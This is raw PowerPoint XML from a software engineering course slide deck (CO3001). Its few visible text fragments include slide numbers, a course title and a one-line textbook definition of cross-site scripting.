            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7015D3E5-CB65-4B46-85D9-1397DC12DE0E}" type="slidenum">
              <a:rPr lang="en-US" altLang="nb-NO" sz="1300">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="1300">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3131792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b-NO" altLang="nb-NO"/>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000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7D1BDF65-BA70-4351-8265-6774C103F8B7}" type="slidenum">
              <a:rPr lang="en-US" altLang="nb-NO" sz="1300">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="1300">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3912665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b-NO" altLang="nb-NO"/>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000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E9509FFF-7B21-4184-80AE-05DA5EE2E9CE}" type="slidenum">
              <a:rPr lang="en-US" altLang="nb-NO" sz="1300">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="1300">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3524791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454150" y="0"/>
            <a:ext cx="9820275" cy="5524500"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln cap="flat" algn="ctr"/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525" cap="flat" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91542" rIns="91542"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>The red ones are the new ones.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3868389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645AD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3" tooltip="Code injection"/>
              </a:rPr>
              <a:t>inject</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4" tooltip="Client-side script"/>
              </a:rPr>
              <a:t>client-side scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> into web pages viewed by other users</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB4F38C2-4548-F541-8261-4C1D96E7A166}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193553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6349" y="1"/>
            <a:ext cx="12192000" cy="52938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6350" y="-24063"/>
            <a:ext cx="12185652"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3897256"/>
            <a:ext cx="7772400" cy="1463040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="3600" spc="200" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="3897256"/>
            <a:ext cx="3200400" cy="1463040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="160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Thang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Bui</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8386843" y="4201225"/>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34709"/>
            <a:ext cx="1278800" cy="871990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3322651" y="529389"/>
            <a:ext cx="7772400" cy="2317424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="4400" kern="1200" cap="all" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>Software engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9284299" y="2410485"/>
            <a:ext cx="1358064" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>CO3001</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2930726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ontent bullets">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noProof="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1282701" y="2420889"/>
            <a:ext cx="10562167" cy="3888432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="1C3B7A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="0F5494"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:buClr>
                <a:srgbClr val="1C3B7A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr baseline="0">
                <a:solidFill>
                  <a:srgbClr val="0F5494"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1200150" indent="-285750" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="1C3B7A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0F5494"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1543050" indent="-171450" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="1C3B7A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0F5494"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2000250" indent="-171450" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="1C3B7A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0F5494"/>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32632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4D73DFF9-DB18-494B-B979-25EB5D7AEFC6}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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4137547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2192000" cy="57751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6350" y="1"/>
            <a:ext cx="12185652"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3885224"/>
            <a:ext cx="77724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3885224"/>
            <a:ext cx="32004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7E0B160-58DE-4686-816E-712F84F7BBC1}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8386843" y="4189193"/>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64800"/>
            <a:ext cx="869947" cy="593200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4164062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96254"/>
            <a:ext cx="10786873" cy="12272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1524002"/>
            <a:ext cx="4965192" cy="47853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1011" y="1524002"/>
            <a:ext cx="5329988" cy="47853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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{92D3FF3D-9B25-4CE8-B1E5-6CD6DE6093BC}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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4194971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84222"/>
            <a:ext cx="10786873" cy="12392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1524002"/>
            <a:ext cx="513604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346962"/>
            <a:ext cx="5136040" cy="3962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843" y="1524002"/>
            <a:ext cx="5394157"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6416843" y="2346962"/>
            <a:ext cx="5394157" cy="3962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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EE98C3B9-3F12-4F6E-BA3D-D5C8E894772F}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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617807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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FE2C97A0-04CE-47C3-BA5E-8776F65D5494}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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45991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2CB83317-B4B1-474B-AC15-F122F52A3CDA}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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64800"/>
            <a:ext cx="869947" cy="593200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1580595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lvl1pPr>
              <a:defRPr smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3E77BAA3-58C1-4D74-9D77-D462AA148018}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</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7" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="673100"/>
            <a:ext cx="10972800" cy="580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9285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xt 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lvl1pPr>
              <a:defRPr smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4773EA02-01C7-4CFD-8BE2-5A93ADF4E7E2}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</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7" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="673100"/>
            <a:ext cx="10972800" cy="58039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6301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7" y="96254"/>
            <a:ext cx="10786871" cy="12151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1528012"/>
            <a:ext cx="10786872" cy="4781349"/>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30"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fld id="{488943BA-DA43-4924-BCB9-E75FCB702E38}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4842933"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a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="762000" y="224745"/>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6264800"/>
            <a:ext cx="869947" cy="593200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91348755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61" r:id="rId8"/>
    <p:sldLayoutId id="2147483723" r:id="rId9"/>
    <p:sldLayoutId id="2147483763" r:id="rId10"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0"/>
  <p:txStyles>
    <p:titleStyle>
